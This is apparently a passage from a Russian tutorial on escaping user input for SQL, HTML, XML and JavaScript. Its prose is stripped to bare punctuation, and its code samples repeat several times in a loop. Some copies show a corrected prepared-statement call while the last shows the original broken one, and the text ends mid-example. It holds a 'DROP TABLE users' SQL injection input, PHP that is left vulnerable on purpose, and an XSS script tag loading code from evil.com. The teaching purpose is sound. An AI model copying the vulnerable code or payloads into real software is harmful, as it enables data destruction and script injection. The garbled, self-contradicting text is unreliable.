Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<?php // Output encoding: htmlspecialchars() converts &, <, > and double quotes to entities, so post content is shown as text rather than parsed as markup. Single quotes are converted only with ENT_QUOTES on PHP versions before 8.1, so pass ENT_QUOTES and the charset explicitly, e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), if the value is ever placed inside an attribute. ?>
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
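// Prepared statement: the query text is sent with a placeholder and the user-supplied
// value is bound separately, so it is never parsed as SQL. PDOStatement::execute() takes
// an array with one entry per placeholder; the original passed the bare string, which
// PHP 8 rejects with a TypeError.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);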
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// Intentionally vulnerable example from the text: the request value is interpolated into
// the SQL string with no escaping and no parameter binding, so a quote in the input ends
// the string literal and the rest is parsed as SQL (the DROP TABLE example below shows this).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php // Intentionally vulnerable example from the text: $post['username'] and $post['body'] are echoed without HTML escaping, so markup stored in a post is rendered by the browser instead of being shown as text (the script-tag example below). ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping before interpolation: mysql_real_escape_string() backslash-escapes the quote,
// so the input stays inside the string literal (see the escaped queries below).
// Caveats: the mysql_* extension is deprecated and was removed in PHP 7; the escape only
// protects a value that is quoted in the query, and it relies on the connection charset
// matching the data. The prepared-statement form shown later is the preferred fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<?php // Output encoding: htmlspecialchars() converts &, <, > and double quotes to entities, so post content is shown as text rather than parsed as markup. Single quotes are converted only with ENT_QUOTES on PHP versions before 8.1, so pass ENT_QUOTES and the charset explicitly, e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), if the value is ever placed inside an attribute. ?>
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
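// Prepared statement: the query text is sent with a placeholder and the user-supplied
// value is bound separately, so it is never parsed as SQL. PDOStatement::execute() takes
// an array with one entry per placeholder; the original passed the bare string, which
// PHP 8 rejects with a TypeError.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);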
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// Intentionally vulnerable example from the text: the request value is interpolated into
// the SQL string with no escaping and no parameter binding, so a quote in the input ends
// the string literal and the rest is parsed as SQL (the DROP TABLE example below shows this).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php // Intentionally vulnerable example from the text: $post['username'] and $post['body'] are echoed without HTML escaping, so markup stored in a post is rendered by the browser instead of being shown as text (the script-tag example below). ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping before interpolation: mysql_real_escape_string() backslash-escapes the quote,
// so the input stays inside the string literal (see the escaped queries below).
// Caveats: the mysql_* extension is deprecated and was removed in PHP 7; the escape only
// protects a value that is quoted in the query, and it relies on the connection charset
// matching the data. The prepared-statement form shown later is the preferred fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<?php // Output encoding: htmlspecialchars() converts &, <, > and double quotes to entities, so post content is shown as text rather than parsed as markup. Single quotes are converted only with ENT_QUOTES on PHP versions before 8.1, so pass ENT_QUOTES and the charset explicitly, e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), if the value is ever placed inside an attribute. ?>
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
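// Prepared statement: the query text is sent with a placeholder and the user-supplied
// value is bound separately, so it is never parsed as SQL. PDOStatement::execute() takes
// an array with one entry per placeholder; the original passed the bare string, which
// PHP 8 rejects with a TypeError.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);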
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// Intentionally vulnerable example from the text: the request value is interpolated into
// the SQL string with no escaping and no parameter binding, so a quote in the input ends
// the string literal and the rest is parsed as SQL (the DROP TABLE example below shows this).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php // Intentionally vulnerable example from the text: $post['username'] and $post['body'] are echoed without HTML escaping, so markup stored in a post is rendered by the browser instead of being shown as text (the script-tag example below). ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping before interpolation: mysql_real_escape_string() backslash-escapes the quote,
// so the input stays inside the string literal (see the escaped queries below).
// Caveats: the mysql_* extension is deprecated and was removed in PHP 7; the escape only
// protects a value that is quoted in the query, and it relies on the connection charset
// matching the data. The prepared-statement form shown later is the preferred fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<?php // Output encoding: htmlspecialchars() converts &, <, > and double quotes to entities, so post content is shown as text rather than parsed as markup. Single quotes are converted only with ENT_QUOTES on PHP versions before 8.1, so pass ENT_QUOTES and the charset explicitly, e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), if the value is ever placed inside an attribute. ?>
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
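// Prepared statement: the query text is sent with a placeholder and the user-supplied
// value is bound separately, so it is never parsed as SQL. PDOStatement::execute() takes
// an array with one entry per placeholder; the original passed the bare string, which
// PHP 8 rejects with a TypeError.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);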
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// Intentionally vulnerable example from the text: the request value is interpolated into
// the SQL string with no escaping and no parameter binding, so a quote in the input ends
// the string literal and the rest is parsed as SQL (the DROP TABLE example below shows this).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php // Intentionally vulnerable example from the text: $post['username'] and $post['body'] are echoed without HTML escaping, so markup stored in a post is rendered by the browser instead of being shown as text (the script-tag example below). ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping before interpolation: mysql_real_escape_string() backslash-escapes the quote,
// so the input stays inside the string literal (see the escaped queries below).
// Caveats: the mysql_* extension is deprecated and was removed in PHP 7; the escape only
// protects a value that is quoted in the query, and it relies on the connection charset
// matching the data. The prepared-statement form shown later is the preferred fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<?php // Output encoding: htmlspecialchars() converts &, <, > and double quotes to entities, so post content is shown as text rather than parsed as markup. Single quotes are converted only with ENT_QUOTES on PHP versions before 8.1, so pass ENT_QUOTES and the charset explicitly, e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), if the value is ever placed inside an attribute. ?>
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
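// Prepared statement: the query text is sent with a placeholder and the user-supplied
// value is bound separately, so it is never parsed as SQL. PDOStatement::execute() takes
// an array with one entry per placeholder; the original passed the bare string, which
// PHP 8 rejects with a TypeError.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);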
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
